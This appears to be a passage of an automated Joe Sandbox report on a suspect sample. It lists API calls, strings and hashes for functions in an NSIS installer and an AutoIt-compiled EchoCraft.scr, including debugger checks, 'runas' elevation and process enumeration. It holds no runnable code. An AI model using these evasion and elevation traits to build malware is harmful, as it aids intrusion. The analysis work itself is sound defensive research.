Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718

Function 00405C3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
CloseHandle.KERNEL32(?), ref: 00405C71

Strings

Error launching installer, xrefs: 00405C48

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68

Function 004062A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 004062A5, 004062AA

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: CloseHandlelstrlenwvsprintf
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3509786178-2769509956
Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E

Function 00405DB6 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

Analysis Process: EchoCraft.scrPID: 7900, Parent PID: 7808COMMON

Execution Graph

Execution Coverage:	2.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.6%
Total number of Nodes:	2000
Total number of Limit Nodes:	80

Executed Functions

Function 00A829A4 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 219
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00A829D3

Part of subcall function 00A8B0DB: _wcslen.LIBCMT ref: 00A8B0EE

GetCurrentProcess.KERNEL32(?,00B1D958,00000000,?,?), ref: 00A82AEA
IsWow64Process.KERNEL32(00000000,?,?), ref: 00A82AF1
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00A82B1C
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00A82B2E
GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00A82B3C
FreeLibrary.KERNEL32(00000000,?,?), ref: 00A82B43
GetSystemInfo.KERNEL32(?,?,?), ref: 00A82B68

Strings

kernel32.dll, xrefs: 00A82B17
GetNativeSystemInfo, xrefs: 00A82B28

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 3290436268-192647395
Opcode ID: 39c741021ce3eed6c400c7cdbb4f8fd1ed2d7188af4b0eae6e91c13474f208aa
Instruction ID: 391ee279099e972659140fb9da8d0c1ae05fce708bd2a5d32114d2ad5db36773
Opcode Fuzzy Hash: 39c741021ce3eed6c400c7cdbb4f8fd1ed2d7188af4b0eae6e91c13474f208aa
Instruction Fuzzy Hash: C291827A90F3C0DFDB25DB787C457A67FA4AF27302B0588DDE185A3225DE284505CB29

Function 00A8331E Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 148
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00A8292D,?), ref: 00A8334E
IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00A8292D,?), ref: 00A83361
GetFullPathNameW.KERNEL32(00007FFF,?,?,00B52408,00B523F0,?,?,?,?,?,?,00A8292D,?), ref: 00A833CD

Part of subcall function 00A8B0DB: _wcslen.LIBCMT ref: 00A8B0EE

Part of subcall function 00A845A6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00A833F5,00B52408,?,?,?,?,?,?,?,00A8292D,?), ref: 00A845E7

SetCurrentDirectoryW.KERNEL32(?,00000001,00B52408,?,?,?,?,?,?,?,00A8292D,?), ref: 00A8344E
MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00AC3E23
SetCurrentDirectoryW.KERNEL32(?,00B52408,?,?,?,?,?,?,?,00A8292D,?), ref: 00AC3E64
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00B431F4,00B52408,?,?,?,?,?,?,?,00A8292D), ref: 00AC3EED
ShellExecuteW.SHELL32(00000000,?,?), ref: 00AC3EF4

Part of subcall function 00A83466: GetSysColorBrush.USER32(0000000F), ref: 00A83471
Part of subcall function 00A83466: LoadCursorW.USER32(00000000,00007F00), ref: 00A83480
Part of subcall function 00A83466: LoadIconW.USER32(00000063), ref: 00A83496
Part of subcall function 00A83466: LoadIconW.USER32(000000A4), ref: 00A834A8
Part of subcall function 00A83466: LoadIconW.USER32(000000A2), ref: 00A834BA
Part of subcall function 00A83466: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00A834D2
Part of subcall function 00A83466: RegisterClassExW.USER32(?), ref: 00A83523

Part of subcall function 00A83546: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00A83574
Part of subcall function 00A83546: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A83595
Part of subcall function 00A83546: ShowWindow.USER32(00000000,?,?,?,?,?,?,00A8292D,?), ref: 00A835A9
Part of subcall function 00A83546: ShowWindow.USER32(00000000,?,?,?,?,?,?,00A8292D,?), ref: 00A835B2

Part of subcall function 00A83DF8: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A83EC9

Strings

AutoIt, xrefs: 00AC3E18
It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00AC3E1D
runas, xrefs: 00AC3EE8

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
API String ID: 683915450-2030392706
Opcode ID: 4b7fedd7959d88daf0371bbccb0414bcdbd058bc67cac179faaf87e64a041041
Instruction ID: 512ce67eb68dff0b7af3a08afce490a5f014cc63a46de1c8f508638d09ab68e1
Opcode Fuzzy Hash: 4b7fedd7959d88daf0371bbccb0414bcdbd058bc67cac179faaf87e64a041041
Instruction Fuzzy Hash: 0D51F832209341AECB05FF60ED55EAE7BE4AB96B41F00059CF591472A2DE388B4DD726

Function 00AEDC3E Relevance: 7.6, APIs: 5, Instructions: 89
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00AEDC63
Process32FirstW.KERNEL32(00000000,?), ref: 00AEDC71
Process32NextW.KERNEL32(00000000,?), ref: 00AEDC91
CompareStringW.KERNEL32(00000400,00000001,?,?,?,?,?), ref: 00AEDD09
CloseHandle.KERNELBASE(00000000), ref: 00AEDD49

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32
String ID:
API String ID: 2000298826-0
Opcode ID: ab84935becdf8e58eab3b87b28fb5375cf4d98f07fbad0e5f9f7a7fc0a677e93
Instruction ID: f0ffda4409b1025b8ea1d4d5621ea2d0f222b9eae1838d57e4265812fbe522a6
Opcode Fuzzy Hash: ab84935becdf8e58eab3b87b28fb5375cf4d98f07fbad0e5f9f7a7fc0a677e93
Instruction Fuzzy Hash: 52319C71108241AFD301EF64DD85AAFBBF8AF99350F54092DF581831A1EB70D949CB92

Function 00AA5108 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000003,?,00AA50DE,00000003,00B49820,0000000C,00AA5235,00000003,00000002,00000000,?,00AB2D05,00000003), ref: 00AA5129
TerminateProcess.KERNEL32(00000000,?,00AA50DE,00000003,00B49820,0000000C,00AA5235,00000003,00000002,00000000,?,00AB2D05,00000003), ref: 00AA5130
ExitProcess.KERNEL32 ref: 00AA5142

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: caf20602156337ba129491e4431ce1a4d1b05433d66c18f787d86cda30df9953
Instruction ID: db9eac2f8397f00dce3058fa8f31d5f8fc8828a755056d424722e8f84e6ee00b
Opcode Fuzzy Hash: caf20602156337ba129491e4431ce1a4d1b05433d66c18f787d86cda30df9953
Instruction Fuzzy Hash: B8E0B631400648AFCF217F64DE19BA87B69EB42391F808518F8159B162DF35DD52CB88

Function 00A8DC90 Relevance: 21.6, APIs: 14, Instructions: 618windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 00A8DD67
timeGetTime.WINMM ref: 00A8DF67
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A8E088
TranslateMessage.USER32(?), ref: 00A8E0DB
DispatchMessageW.USER32(?), ref: 00A8E0E9
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A8E0FF
Sleep.KERNEL32(0000000A), ref: 00A8E111

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: f0803b653134b29393e9cfb7131e5c29049007568b8c460cbe22c01098506b40
Instruction ID: 2c03d8fd97028fadb21778b7544a33e7eb26352d5053add2144e03674843acd4
Opcode Fuzzy Hash: f0803b653134b29393e9cfb7131e5c29049007568b8c460cbe22c01098506b40
Instruction Fuzzy Hash: FF42C171608342EFDB28EF24C884BAAB7F1BF51314F14455AE55A873D1DB70E984DB82

Function 00A835B7 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00A835EA
RegisterClassExW.USER32(00000030), ref: 00A83614
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A83625
InitCommonControlsEx.COMCTL32(?), ref: 00A83642
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A83652
LoadIconW.USER32(000000A9), ref: 00A83668
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A83677

Strings

AutoIt v3 GUI, xrefs: 00A83606
+, xrefs: 00A835D3
0, xrefs: 00A835CC
TaskbarCreated, xrefs: 00A8361A

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 93c4c0810b56450a424572cf78572b965889f73c9c88c6d67c8957c614a4de6d
Instruction ID: 03ae2e9e6da1a9eba3f0c68b7827f090d5bd33b9b4dd3dd352e5b6e314a886ab
Opcode Fuzzy Hash: 93c4c0810b56450a424572cf78572b965889f73c9c88c6d67c8957c614a4de6d
Instruction Fuzzy Hash: AC21CEB5D02318AFDB00DFA4EC89BDDBBB4FB09711F50816AF611A72A0DBB546448F94

Function 00AC0A7C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00AC07BB: CreateFileW.KERNELBASE(00000000,00000000,?,00AC0B25,?,?,00000000,?,00AC0B25,00000000,0000000C), ref: 00AC07D8

GetLastError.KERNEL32 ref: 00AC0B90
__dosmaperr.LIBCMT ref: 00AC0B97
GetFileType.KERNELBASE(00000000), ref: 00AC0BA3
GetLastError.KERNEL32 ref: 00AC0BAD
__dosmaperr.LIBCMT ref: 00AC0BB6
CloseHandle.KERNEL32(00000000), ref: 00AC0BD6
CloseHandle.KERNEL32(?), ref: 00AC0D20
GetLastError.KERNEL32 ref: 00AC0D52
__dosmaperr.LIBCMT ref: 00AC0D59

Strings

H, xrefs: 00AC0CDE

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: aca86068401a8de6fbb05325ac244b0095a1dd3bd469a2c334a4d58986a1d500
Instruction ID: 8c9764b2b1a35bdbc564ed116bc2ebd46faf5419d817f95680c0d46f53089bff
Opcode Fuzzy Hash: aca86068401a8de6fbb05325ac244b0095a1dd3bd469a2c334a4d58986a1d500
Instruction Fuzzy Hash: 00A12232A14248DFDF19DF68D892FAE7BB4AB06324F15025DF811AB292DB309D12CB51

Function 00A84E52 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00A84FF8: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00AC4641,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00A85016

Part of subcall function 00A84B95: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00A84BB7

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00A84F6F
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00AC48D8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00AC4919
RegCloseKey.ADVAPI32(?), ref: 00AC495B
_wcslen.LIBCMT ref: 00AC49C2
_wcslen.LIBCMT ref: 00AC49D1

Strings

\, xrefs: 00AC49D7
Software\AutoIt v3\AutoIt, xrefs: 00A84F65
\Include\, xrefs: 00A84F2C
Include, xrefs: 00AC48CF, 00AC4910

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: 3df0cf14d8c3e0faef86c1d76de2ea2a4adc3ab9d3cebfe7aa6a982cbdc7b56a
Instruction ID: 681a4a4f9abacd01c08d40080fe662a663cec9d4156c32d5a10de8c54ae46de1
Opcode Fuzzy Hash: 3df0cf14d8c3e0faef86c1d76de2ea2a4adc3ab9d3cebfe7aa6a982cbdc7b56a
Instruction Fuzzy Hash: 0C71BF715083019EC304EF25DD95AABBBE8FF49B80F80096EF545872A0EF71DA49CB56

Function 00A83466 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00A83471
LoadCursorW.USER32(00000000,00007F00), ref: 00A83480
LoadIconW.USER32(00000063), ref: 00A83496
LoadIconW.USER32(000000A4), ref: 00A834A8
LoadIconW.USER32(000000A2), ref: 00A834BA
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00A834D2
RegisterClassExW.USER32(?), ref: 00A83523

Part of subcall function 00A835B7: GetSysColorBrush.USER32(0000000F), ref: 00A835EA
Part of subcall function 00A835B7: RegisterClassExW.USER32(00000030), ref: 00A83614
Part of subcall function 00A835B7: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A83625
Part of subcall function 00A835B7: InitCommonControlsEx.COMCTL32(?), ref: 00A83642
Part of subcall function 00A835B7: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A83652
Part of subcall function 00A835B7: LoadIconW.USER32(000000A9), ref: 00A83668
Part of subcall function 00A835B7: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A83677

Strings

#, xrefs: 00A834F9
AutoIt v3, xrefs: 00A83512
0, xrefs: 00A834F2

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 2231ccb1c378b9f690cc6211414dc24accf3a527120add7d2dac465d22b04820
Instruction ID: 899e624db224f16ac84e7662fabbc166e17e58f5b77361ad2a427133dad74542
Opcode Fuzzy Hash: 2231ccb1c378b9f690cc6211414dc24accf3a527120add7d2dac465d22b04820
Instruction Fuzzy Hash: 7B213E71D01314AFDB10AFA5EC49B997FB4FB09B91F40409AF904A72B0DBB95940CF98

Function 00A83C00 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00A83BFA,?,?), ref: 00A83C68
KillTimer.USER32(?,00000001,?,?,?,?,?,00A83BFA,?,?), ref: 00A83C94
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A83CB7
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00A83BFA,?,?), ref: 00A83CC2
CreatePopupMenu.USER32 ref: 00A83CD6
PostQuitMessage.USER32(00000000), ref: 00A83CF7

Strings

TaskbarCreated, xrefs: 00A83CBD

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 8731eb0c0335967b3e0634fd968de04b760d8d0465a1aa692b78ed4b24634792
Instruction ID: e5fa20eaab7821f64f40d39f6ea32aac189a18101731d7bad4d02688b850e0ab
Opcode Fuzzy Hash: 8731eb0c0335967b3e0634fd968de04b760d8d0465a1aa692b78ed4b24634792
Instruction Fuzzy Hash: 264119B3204204ABDF153F38DD4EBB93B65E706B01F044569FA02AA2E1DEA59F489351

Function 00A863CE Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00A86417
CoUninitialize.COMBASE ref: 00A864B6
UnregisterHotKey.USER32(?), ref: 00A8669B
DestroyWindow.USER32(?), ref: 00AC4DC7
FreeLibrary.KERNEL32(?), ref: 00AC4E2C
